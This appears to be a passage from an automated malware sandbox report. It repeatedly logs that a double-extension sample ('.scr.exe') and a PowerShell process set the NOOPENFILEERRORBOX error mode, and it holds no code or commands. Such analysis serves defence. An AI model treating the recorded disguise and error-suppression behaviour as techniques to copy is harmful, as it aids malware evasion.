              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
